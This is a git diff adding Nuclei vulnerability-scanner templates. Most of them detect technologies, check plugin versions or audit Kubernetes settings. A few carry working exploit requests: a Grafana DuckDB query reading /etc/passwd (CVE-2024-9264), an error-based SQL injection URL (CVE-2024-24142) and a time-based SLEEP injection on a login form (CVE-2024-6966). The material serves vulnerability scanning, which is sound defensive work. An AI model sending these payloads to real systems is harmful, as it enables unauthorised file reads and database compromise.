b/poc/cve/CVE-2024-9264.yaml new file mode 100644 index 0000000000..939368a915 --- /dev/null +++ b/poc/cve/CVE-2024-9264.yaml @@ -0,0 +1,92 @@ +id: CVE-2024-9264 + +info: + name: Grafana Post-Auth DuckDB - SQL Injection (File Read) + author: princechaddha + severity: critical + description: The SQL Expressions experimental feature of Grafana allows for the evaluation of `duckdb` queries containing user input. These queries are insufficiently sanitized before being passed to `duckdb`, leading to a command injection and local file inclusion vulnerability. Any user with the VIEWER or higher permission is capable of executing this attack. The `duckdb` binary must be present in Grafana's $PATH for this attack to function; by default, this binary is not installed in Grafana distributions. + remediation: | + Apply the vendor-supplied patch or upgrade to a non-vulnerable version. + reference: + - https://x.com/nol_tech/status/1847639874909749443 + - https://nvd.nist.gov/vuln/detail/CVE-2024-9264 + - https://grafana.com/security/security-advisories/cve-2024-9264/ + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://github.com/nomi-sec/PoC-in-GitHub + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2024-9264 + cwe-id: CWE-94 + epss-score: 0.00043 + epss-percentile: 0.09691 + metadata: + max-request: 2 + vendor: grafana + product: grafana + shodan-query: + - http.title:"grafana" + - cpe:"cpe:2.3:a:grafana:grafana" + fofa-query: + - app="grafana" + - title="grafana" + google-query: intitle:"grafana" + tags: cve,cve2024,grafana,authenticated +flow: http(1) && http(2) + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Accept-Language: en-US,en;q=0.5 + Referer: {{BaseURL}} + content-type: application/json + + {"user":"{{username}}","password":"{{password}}"} + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "grafana_session" + internal: true + + - raw: + - | + POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q101 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "from": "1729313027261", + "queries": [ + { + "datasource": { + "name": "Expression", + "type": "__expr__", + "uid": "__expr__" + }, + "expression": "SELECT content FROM read_blob('/etc/passwd')", + "hide": false, + "refId": "B", + "type": "sql", + "window": "" + } + ], + "to": "1729334627261" + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "root:" + + - type: word + part: body + words: + - '"data":{' diff --git a/poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml b/poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml new file mode 100644 index 0000000000..a28570e900 --- /dev/null +++ b/poc/cve/CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9376-dbbbe5df90e59d17c7c7d8c8dd600952 + +info: + name: > + Kata Plus – Addons for Elementor – Widgets, Extensions and Templates <= 1.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload + author: topscoder + severity: low + description: > + The Kata Plus – Addons for Elementor – Widgets, Extensions and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/05c7267e-2e0c-48e9-bdaa-c8bc0b9ec8a6?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9376 + metadata: + fofa-query: "wp-content/plugins/kata-plus/" + google-query: inurl:"/wp-content/plugins/kata-plus/" + shodan-query: 'vuln:CVE-2024-9376' + tags: cve,wordpress,wp-plugin,kata-plus,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kata-plus/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kata-plus" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml b/poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml new file mode 100644 index 0000000000..ba15637cf5 --- /dev/null +++ b/poc/cve/CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9438-35e80a39f9c5a9c6a465bf9aae910e35 + +info: + name: > + SEUR Oficial <= 2.2.11 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The SEUR Oficial plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'change_service' parameter in all versions up to, and including, 2.2.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/88edf229-2be2-49d0-b500-e8ff7708f806?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-9438 + metadata: + fofa-query: "wp-content/plugins/seur/" + google-query: inurl:"/wp-content/plugins/seur/" + shodan-query: 'vuln:CVE-2024-9438' + tags: cve,wordpress,wp-plugin,seur,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/seur/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "seur" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml b/poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml new file mode 100644 index 0000000000..4bed1d573a --- /dev/null +++ b/poc/cve/CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9505-bbf8db303ac965c608b6fcb6b5637bca + +info: + name: > + Beaver Builder – WordPress Page Builder <= 2.8.4.2 - Authenticated (Contributor+) Stored DOM-Based Cross-Site Scripting via Button Widget + author: topscoder + severity: low + description: > + The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.8.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7cfab048-efc6-4c7c-a1bd-0a9daf8779bc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-9505 + metadata: + fofa-query: "wp-content/plugins/beaver-builder-lite-version/" + google-query: inurl:"/wp-content/plugins/beaver-builder-lite-version/" + shodan-query: 'vuln:CVE-2024-9505' + tags: cve,wordpress,wp-plugin,beaver-builder-lite-version,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/beaver-builder-lite-version/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beaver-builder-lite-version" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.8.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml b/poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml new file mode 100644 index 0000000000..6fe9238730 --- /dev/null +++ b/poc/cve/CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9629-f373fd300647fa035c1852f606cc1e3e + +info: + name: > + Contact Form 7 + Telegram <= 0.8.5 - Missing Authorization to Authenticated (Subscriber+) Subscription Approve/Pause/Refuse + author: topscoder + severity: low + description: > + The Contact Form 7 + Telegram plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wpcf7_Telegram::ajax' function in versions up to, and including, 0.8.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to approve, pause and refuse subscriptions. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330fa5a-b471-45ee-a2a6-3ae8f3941bfe?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L + cvss-score: 5.4 + cve-id: CVE-2024-9629 + metadata: + fofa-query: "wp-content/plugins/cf7-telegram/" + google-query: inurl:"/wp-content/plugins/cf7-telegram/" + shodan-query: 'vuln:CVE-2024-9629' + tags: cve,wordpress,wp-plugin,cf7-telegram,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-telegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-telegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml b/poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml new file mode 100644 index 0000000000..f5d1ff358a --- /dev/null +++ b/poc/cve/CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-9933-2395a386aa24a6b2e0af0d7ebb971352 + +info: + name: > + WatchTowerHQ <= 3.10.1 - Authentication Bypass to Administrator due to Missing Empty Value Check + author: topscoder + severity: critical + description: > + The WatchTowerHQ plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.10.1. This is due to the 'watchtower_ota_token' default value is empty, and the not empty check is missing in the 'Password_Less_Access::login' function. This makes it possible for unauthenticated attackers to log in to the WatchTowerHQ client administrator user. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/50349086-e7b0-4f73-8722-1367cc05180e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-9933 + metadata: + fofa-query: "wp-content/plugins/watchtowerhq/" + google-query: inurl:"/wp-content/plugins/watchtowerhq/" + shodan-query: 'vuln:CVE-2024-9933' + tags: cve,wordpress,wp-plugin,watchtowerhq,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/watchtowerhq/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "watchtowerhq" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.10.1') \ No newline at end of file diff --git "a/poc/cve/CVE-2024\342\200\22324142.yaml" "b/poc/cve/CVE-2024\342\200\22324142.yaml" new file mode 100644 index 0000000000..3fec068fb3 --- /dev/null +++ "b/poc/cve/CVE-2024\342\200\22324142.yaml" @@ -0,0 +1,26 @@ +id: sql-injection-detection + +info: + name: SQL Injection Detection + author: hellonotworld99, yjeongc, HohoHoui, shinyeji-spea + severity: high + description: This template checks for SQL injection vulnerability in the 'task' parameter of the delete-task.php endpoint by looking for a specific database name in error messages. + reference: + - https://sqlmap.org/ + - https://github.com/BurakSevben/CVE-2024-24142?tab=readme-ov-file + tags: sql,injection + +requests: + - method: GET + path: + - "{{BaseURL}}/school-task-manager/endpoint/delete-task.php?task=5' AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT DATABASE()), 0x5c))--'" + matchers-condition: or + matchers: + - type: regex + name: database-name-error + regex: + - "school_task_manager_db" + part: body + condition: and + + diff --git a/poc/cve/cve-2024-6966.yaml b/poc/cve/cve-2024-6966.yaml new file mode 100644 index 0000000000..def1ee9365 --- /dev/null +++ b/poc/cve/cve-2024-6966.yaml @@ -0,0 +1,42 @@ +id: cve-2024-6966 + +info: + name: Itsourcecode Online Blood Bank Management System - Time Based SQL injection in Login Page + author: cl4irv0yance + description: In the login portal of the Online Blood Bank Management application, it is possible to inject SQL into "user" and exploit time-based SQL injection. + severity: High + reference: + - https://github.com/HermesCui/CVE/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2024-6966 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L + cvss-score: 7.3 + cve-id: cve-2024-6966 + tags: sqli,cve,cve-2024,cve-2024-6966,itsourcecode + + +http: + - raw: + - | + @timeout: 25s + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + tab=on&user=tab%3Don%26user%3D123321%27+AND+%28SELECT+8755+FROM+%28SELECT%28SLEEP%2810%29%29%29xGkg%29+AND+%27emTj%27%3D%27emTj%26pass%3D123123%26sub%3DLog+In%22&pass=test&sub=Log+In + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Username' + - 'Password' + - 'Keep me Signed in' + - 'Forgot Password' + - 'Wrong email or password' + condition: and + + - type: dsl + dsl: + - 'duration>=10' diff --git a/poc/default/change-default-port.yaml b/poc/default/change-default-port.yaml new file mode 100644 index 0000000000..43129ce8c0 --- /dev/null +++ b/poc/default/change-default-port.yaml @@ -0,0 +1,23 @@ +id: change-default-port + +info: + name: Change SSH Default Port + author: pussycat0x + severity: info + description: | + Reduces Automated Attacks: Changing the default port can help avoid most automated attacks that target port 22. + remediation: | + Ensure the following line is present: : Port 2222 + reference: + - https://vishalraj82.medium.com/hardening-openssh-security-37f5d634015f + - https://gcore.com/learning/how-to-change-ssh-port/ + tags: audit,config,file,ssh + +file: + - extensions: + - all + + matchers: + - type: word + words: + - "#Port 22" \ No newline at end of file diff --git a/poc/default/k8s-default-namespace-used.yaml b/poc/default/k8s-default-namespace-used.yaml new file mode 100644 index 0000000000..0b43dc37db --- /dev/null +++ b/poc/default/k8s-default-namespace-used.yaml @@ -0,0 +1,49 @@ +id: k8s-default-namespace-used + +info: + name: Default Namespace Usage in Deployments + author: princechaddha + severity: high + description: Checks if Kubernetes Deployments are using the default namespace, which can lead to security risks and mismanagement issues. + impact: | + Using the default namespace for Kubernetes Deployments can increase security risks as it might allow broader access than necessary. It also complicates resource management across multiple teams and applications. + remediation: | + Avoid using the default namespace for Kubernetes Deployments. Create and specify dedicated namespaces tailored to specific applications or teams to enhance security and manage resources effectively. + reference: + - https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,namespaces,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.metadata.namespace.toLowerCase() === "default") { + let result = (`Deployment '${deployment.metadata.name}' is using the default namespace, which is not recommended.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100cb1a8cc055b7e8807ef5dad291c1259028e3d518155d9340c1fe72cb8a6cfad902201644f419892fe61eeb0bccd7e89bf5e57e87cdfb23374f91551df421236c4585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/cyberpanel-detect.yaml b/poc/detect/cyberpanel-detect.yaml new file mode 100644 index 0000000000..79b35965e2 --- /dev/null +++ b/poc/detect/cyberpanel-detect.yaml @@ -0,0 +1,35 @@ +id: cyberpanel-detect + +info: + name: Cyberpanel Login Panel - Detect + author: mailler + severity: info + description: Cyberpanel login panel was detected. + reference: + - https://cyberpanel.net/KnowledgeBase/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + metadata: + max-request: 1 + shodan-query: cyberpanel + fofa-query: app="Cyberpanel" + product: Cyberpanel + tags: cyberpanel,panel,login + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - " Login - CyberPanel " + condition: or + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/detect/docker-ports-detection.yaml b/poc/detect/docker-ports-detection.yaml new file mode 100644 index 0000000000..83cd30db80 --- /dev/null +++ b/poc/detect/docker-ports-detection.yaml @@ -0,0 +1,19 @@ +id: docker-ports-detection +info: + name: Docker Ports Detection + author: drewvravick + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}:2375/version" + - "{{BaseURL}}:2376/version" + + matchers: + - type: word + words: + - "ApiVersion" + - "Docker" + condition: and + part: body diff --git a/poc/detect/flexmls-detect.yaml b/poc/detect/flexmls-detect.yaml new file mode 100644 index 0000000000..aaf6674611 --- /dev/null +++ b/poc/detect/flexmls-detect.yaml @@ -0,0 +1,47 @@ +id: flexmls-idx-detect + +info: + name: Flexmls IDX - Detect + author: rxerium,sorrowx3 + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: html:"/wp-content/plugins/flexmls-idx" + tags: tech,detect,flexmls,idx + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/flexmls-idx/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/flexmls-idx.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' \ No newline at end of file diff --git a/poc/detect/kaseya-detect.yaml b/poc/detect/kaseya-detect.yaml new file mode 100644 index 0000000000..742e14302f --- /dev/null +++ b/poc/detect/kaseya-detect.yaml @@ -0,0 +1,27 @@ +id: kaseya-detect + +info: + name: Kaseya Detection + author: rxerium + severity: info + reference: + - https://www.kaseya.com/ + metadata: + max-request: 2 + shodan-query: "http.favicon.hash:-1445519482" + tags: tech,favicon,kaseya,detect + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/images/favicon.ico" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + name: "Kaseya" + dsl: + - "status_code==200 && (\"-1445519482\" == mmh3(base64_py(body)))" \ No newline at end of file diff --git a/poc/detect/localai-detect.yaml b/poc/detect/localai-detect.yaml new file mode 100644 index 0000000000..2c3ffbfe50 --- /dev/null +++ b/poc/detect/localai-detect.yaml @@ -0,0 +1,32 @@ +id: localai-detect + +info: + name: LocalAI - Detect + author: s4e-io + severity: info + description: | + An instance running LocalAI was detected. + reference: + - https://github.com/mudler/LocalAI + - https://localai.io/ + metadata: + verified: true + max-request: 1 + vendor: mudler + product: localai + fofa-query: "LocalAI API" + shodan-query: http.favicon.hash:-976853304 + tags: localai,tech,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'contains_all(body, "alt=\"LocalAI Logo\"", "LocalAI")' + - 'status_code == 200' + condition: and diff --git a/poc/detect/pghero-detect.yaml b/poc/detect/pghero-detect.yaml new file mode 100644 index 0000000000..e9bfc60105 --- /dev/null +++ b/poc/detect/pghero-detect.yaml @@ -0,0 +1,27 @@ +id: pghero-detect + +info: + name: PgHero - Detect + author: righettod + severity: info + description: | + PgHero products was detected. + reference: + - https://github.com/ankane/pghero + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"PgHero" + tags: tech,pghero,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>pghero", "/assets/pghero/", ">pghero</a>")' + condition: and diff --git a/poc/docker/docker-ports-detection.yaml b/poc/docker/docker-ports-detection.yaml new file mode 100644 index 0000000000..83cd30db80 --- /dev/null +++ b/poc/docker/docker-ports-detection.yaml @@ -0,0 +1,19 @@ +id: docker-ports-detection +info: + name: Docker Ports Detection + author: drewvravick + severity: info + +http: + - method: GET + path: + - "{{BaseURL}}:2375/version" + - "{{BaseURL}}:2376/version" + + matchers: + - type: word + words: + - "ApiVersion" + - "Docker" + condition: and + part: body diff --git a/poc/docker/k8s-containers-share-host-ipc.yaml b/poc/docker/k8s-containers-share-host-ipc.yaml new file mode 100644 index 0000000000..0aa55f62d1 --- /dev/null +++ b/poc/docker/k8s-containers-share-host-ipc.yaml @@ -0,0 +1,48 @@ +id: k8s-containers-share-host-ipc + +info: + name: Containers sharing host IPC namespace + author: princechaddha + severity: critical + description: Checks if any containers in Kubernetes Pods are configured to share the host's IPC namespace, which can lead to security risks. + impact: | + Sharing the host's IPC namespace allows containers to access data across all containers on the same host, posing potential security risks. + remediation: Ensure that no container in Kubernetes Pods is set to share the host IPC namespace. Configure 'spec.hostIPC' to 'false' for all pods to isolate IPC namespaces. + reference: + - https://kubernetes.io/docs/tasks/configure-pod-container/security-context/ + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,pods,k8s-cluster-security +flow: | + code(1); + for (let pod of template.items) { + set("pod",pod) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get pods --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + pod = JSON.parse(template.pod); + if (pod.spec.hostIPC) { + let result = (`Pod '${pod.metadata.name}' in namespace '${pod.metadata.namespace}' is configured to share the host IPC namespace.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4b0a004830460221008e39125e4e88cd6fdf4a7a42cb65ed28ad966f3e82c707981a3a9b61eda975ee022100b7740c6607e3cd3abc78a7ce0787b992b3a7c2a1982f98696000b083db97e7f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/docker/k8s-privileged-container.yaml b/poc/docker/k8s-privileged-container.yaml new file mode 100644 index 0000000000..47e9b4cc32 --- /dev/null +++ b/poc/docker/k8s-privileged-container.yaml @@ -0,0 +1,53 @@ +id: k8s-privileged-containers + +info: + name: Privileged Containers Found in Deployments + author: princechaddha + severity: critical + description: Checks for containers running in privileged mode within Kubernetes Deployments, and now also checks for user privileges and privilege escalation settings. + impact: | + Running containers in privileged mode, as the root user, or with privilege escalation enabled can grant them access to host resources and could lead to security breaches if the container is compromised. + remediation: | + Ensure that no container in Kubernetes Deployments runs in privileged mode, as the root user, or with privilege escalation enabled. Modify the security context for each container to set `privileged: false`, `runAsUser` appropriately, and `allowPrivilegeEscalation: false`. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,k8s,devsecops,deployments,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + for (let container of deployment.spec.template.spec.containers) { + let sc = container.securityContext || {}; + if (sc.privileged || sc.runAsUser < 1000 || sc.allowPrivilegeEscalation) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' is running container '${container.name}' with insecure settings: Privileged=${sc.privileged}, runAsUser=${sc.runAsUser}, allowPrivilegeEscalation=${sc.allowPrivilegeEscalation}.`); + Export(result); + break; + } + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100b7c380b0fdf17140426a4a3f480f73ec33789c08b9975e1206a6c1078a2d6b45022012b453c2fe3a6501a2aebafbc2ff35422c301b9d7c8c0973cf666de045e5b163:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/docker/k8s-root-container-admission.yaml b/poc/docker/k8s-root-container-admission.yaml new file mode 100644 index 0000000000..491dfb0d89 --- /dev/null +++ b/poc/docker/k8s-root-container-admission.yaml @@ -0,0 +1,49 @@ +id: k8s-root-container-admission + +info: + name: Minimize the admission of root containers + author: princechaddha + severity: critical + description: Checks if any Kubernetes Deployments admit containers that run as root, which can pose a significant security risk. + impact: | + Allowing containers to run as root can lead to privilege escalation and unauthorized access to host resources, significantly compromising the security of the cluster. + remediation: | + Configure security contexts for all pods to run containers with a non-root user. Use Pod Security Policies or OPA/Gatekeeper to enforce these configurations. + reference: + - https://kubernetes.io/docs/concepts/policy/pod-security-policy/#users-and-groups + metadata: + max-request: 2 + tags: cloud,devops,kubernetes,devsecops,deployments,k8s,k8s-cluster-security +flow: | + code(1); + for (let deployment of template.items) { + set("deployment", deployment) + javascript(1); + } + +self-contained: true +code: + - engine: + - sh + - bash + source: kubectl get deployments --all-namespaces --output=json + extractors: + - type: json + name: items + internal: true + json: + - '.items[]' + +javascript: + - code: | + deployment = JSON.parse(template.deployment); + if (deployment.spec.template.spec.containers.some(container => container.securityContext && container.securityContext.runAsUser === null)) { + let result = (`Deployment '${deployment.metadata.name}' in namespace '${deployment.metadata.namespace}' permits containers to run as root.`); + Export(result); + } + + extractors: + - type: dsl + dsl: + - response +# digest: 4a0a00473045022100f14d422cbd57235a92be20140747bc11a4f73ab68bae70297a73e83b90da0e2b02200b47eb6fcdc4533cd22fe335ae241fd43a20d85df6f259b12d6b909cdd59dfbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/appspec-yml-disclosure.yaml b/poc/exposed/appspec-yml-disclosure.yaml index 0366a46dac..1d0ccf1070 100644 --- a/poc/exposed/appspec-yml-disclosure.yaml +++ b/poc/exposed/appspec-yml-disclosure.yaml @@ -1,15 +1,26 @@ id: appspec-yml-disclosure + info: - name: Appspec Yml Disclosure + name: Appspec YML/YAML - Detect author: dhiyaneshDk severity: medium - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + description: Appspec YML and YAML files are susceptible to information disclosure. + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 2 tags: exposure,config -requests: + +http: - method: GET path: - "{{BaseURL}}/appspec.yml" - "{{BaseURL}}/appspec.yaml" + matchers-condition: and matchers: - type: word @@ -19,6 +30,9 @@ requests: - "files:" part: body condition: and + - type: status status: - 200 + +# digest: 4a0a0047304502207a4b0932e4bf9a73ac47c834c7ad8a7afaebc6467f319c5838c3cdbd961ea27f022100f61bb08a799e587699696f96e8e7e3def08d20af7de79c5e24fc939735ed36d4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/extract/http-matcher-extractor-dy-extractor.yaml b/poc/extract/http-matcher-extractor-dy-extractor.yaml new file mode 100644 index 0000000000..eb26d50bf7 --- /dev/null +++ b/poc/extract/http-matcher-extractor-dy-extractor.yaml @@ -0,0 +1,36 @@ +id: http-matcher-extractor-dy-extractor +info: + name: HTTP matcher and extractor & dynamic extractor + description: > + Edgecase to test for a combination of matchers , extractors and dynamic extractors + author: pdteam + severity: info + +http: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + - | + GET {{absolutePath}} HTTP/1.1 + + req-condition: true + extractors: + - type: regex + internal: true + part: body_1 + name: absolutePath + regex: + - '<a href="(/domains)">' + group: 1 + - type: regex + internal: false + part: body_2 + name: title + regex: + - '<title[^>]*>([^<]+)' + group: 1 + matchers: + - type: regex + part: body_2 + regex: + - ']*>([^<]+)' \ No newline at end of file diff --git a/poc/ftp/allow-unencrypted-ftp.yaml b/poc/ftp/allow-unencrypted-ftp.yaml new file mode 100644 index 0000000000..c531e849bc --- /dev/null +++ b/poc/ftp/allow-unencrypted-ftp.yaml @@ -0,0 +1,32 @@ +id: allow-unencrypted-ftp + +info: + name: Allow Unencrypted FTP + author: princechaddha + severity: high + description: Verifies if the FTP server allows unencrypted connections, which can expose sensitive data. + impact: | + Allowing unencrypted FTP can expose credentials and data to attackers during transmission. + remediation: | + Configure FTP to require encrypted connections using SSL/TLS. + tags: ftp,windows,code,windows-audit + +self-contained: true + +code: + 